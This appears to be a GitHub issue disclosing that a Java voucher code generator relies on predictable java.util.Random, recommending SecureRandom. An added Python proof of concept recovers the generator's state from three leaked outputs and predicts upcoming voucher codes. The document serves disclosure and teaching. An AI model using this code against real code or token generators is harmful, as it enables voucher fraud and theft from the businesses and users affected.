
Voucher code generator uses insecure randomness to generate codes

Open chgg-kboberg opened this issue 4 years ago • 0 comments

The voucher code generator implementation uses an insecure source of randomness:

https://github.com/voucherifyio/voucher-code-generator-java/blob/master/src/main/java/io/voucherify/generator/VoucherCodes.java#L7

java.util.Random uses Knuth's linear congruence pseudorandom number generator. Practical seed recovery attacks on this generator are known: https://hal.archives-ouvertes.fr/hal-02700791/document

While this attack requires a long-running Java process to both issue a large number of codes AND a user to obtain (in sequential order) a set of these codes, this is a drop-in fix that resolves this issue.

See #2

chgg-kboberg, Nov 10 '21 16:11
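The state-recovery attack the issue refers to, in a form a reviewer can run offline. This is an added Python example, not code from voucher-code-generator-java or from the issue author. It re-implements java.util.Random's 48-bit linear congruential generator from the publicly specified algorithm, recovers the generator state from three consecutive nextInt() outputs (two to brute-force the 16 hidden bits, one to confirm), and then predicts the voucher codes the same instance will issue next. The 36-character alphabet, the 8-character code length, the assumption that one nextInt(charset.length()) call is made per character, and the assumption that the attacker can observe raw nextInt() values from the same Random instance are all constructed for the example. Codes built from nextInt(36) leak only about 5 bits per character, so recovering the state from codes alone needs more observations and a smarter search than this brute force; the example shows the simplest case to make the weakness concrete.

```python
"""
Attacker-side model of java.util.Random and state recovery from
consecutive nextInt() outputs. Added example; constants and charset are assumptions.
"""

MASK = (1 << 48) - 1   # java.util.Random keeps a 48-bit state
MULT = 0x5DEECE66D
ADD = 0xB

# Constructed voucher alphabet; the real project's charset is not taken from the page.
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


class JavaRandom:
    """Bit-exact re-implementation of java.util.Random's LCG (JDK-specified algorithm)."""

    def __init__(self, seed):
        self.state = (seed ^ MULT) & MASK   # same seed scrambling as the JDK

    @classmethod
    def from_state(cls, state):
        """Build a clone from a recovered internal state (attacker side)."""
        rng = cls.__new__(cls)
        rng.state = state & MASK
        return rng

    def next_bits(self, bits):
        self.state = (self.state * MULT + ADD) & MASK
        return self.state >> (48 - bits)

    def next_int(self):
        """nextInt(): top 32 bits of the new state, as a signed Java int."""
        v = self.next_bits(32)
        return v - (1 << 32) if v & 0x80000000 else v

    def next_int_bound(self, bound):
        """nextInt(int bound), including Java's rejection loop for non-power-of-two bounds."""
        if bound <= 0:
            raise ValueError("bound must be positive")
        if bound & (bound - 1) == 0:
            return (bound * self.next_bits(31)) >> 31
        while True:
            bits = self.next_bits(31)
            val = bits % bound
            # Java retries while (bits - val + (bound-1)) overflows a 32-bit int
            if bits - val + (bound - 1) < (1 << 31):
                return val


def generate_code(rng, length=8):
    """Hypothetical voucher generator: one nextInt(len(CHARSET)) draw per character."""
    return "".join(CHARSET[rng.next_int_bound(len(CHARSET))] for _ in range(length))


def recover_states(out1, out2, out3):
    """
    Recover the 48-bit state from three consecutive nextInt() outputs.
    Each output reveals the top 32 bits of a state, so only 2^16 candidates
    for the hidden low bits of the first state exist; out2 filters them and
    out3 confirms. Returns every state (after out3) consistent with all three;
    in practice that is exactly one.
    """
    hi = (out1 & 0xFFFFFFFF) << 16      # & handles negative Java ints
    want2 = out2 & 0xFFFFFFFF
    want3 = out3 & 0xFFFFFFFF
    found = []
    for low in range(1 << 16):
        s1 = hi | low
        s2 = (s1 * MULT + ADD) & MASK
        if s2 >> 16 != want2:
            continue
        s3 = (s2 * MULT + ADD) & MASK
        if s3 >> 16 == want3:
            found.append(s3)
    return found


def demo(seed=2021, codes=3):
    """Victim leaks three raw ints, then issues vouchers; attacker predicts the vouchers."""
    victim = JavaRandom(seed)
    leaked = [victim.next_int() for _ in range(3)]   # constructed leak of raw outputs
    issued = [generate_code(victim) for _ in range(codes)]

    states = recover_states(*leaked)
    attacker = JavaRandom.from_state(states[0])
    predicted = [generate_code(attacker) for _ in range(codes)]
    return issued, predicted


if __name__ == "__main__":
    issued, predicted = demo()
    print("issued:   ", issued)
    print("predicted:", predicted)
```

The 2^16 loop finishes in well under a second, which is why java.util.Random must be treated as fully predictable once any raw output is exposed. On the Java side, java.security.SecureRandom is a subclass of java.util.Random, so changing the field type is the drop-in replacement the issue mentions; the same nextInt(bound) calls keep working against an unpredictable source.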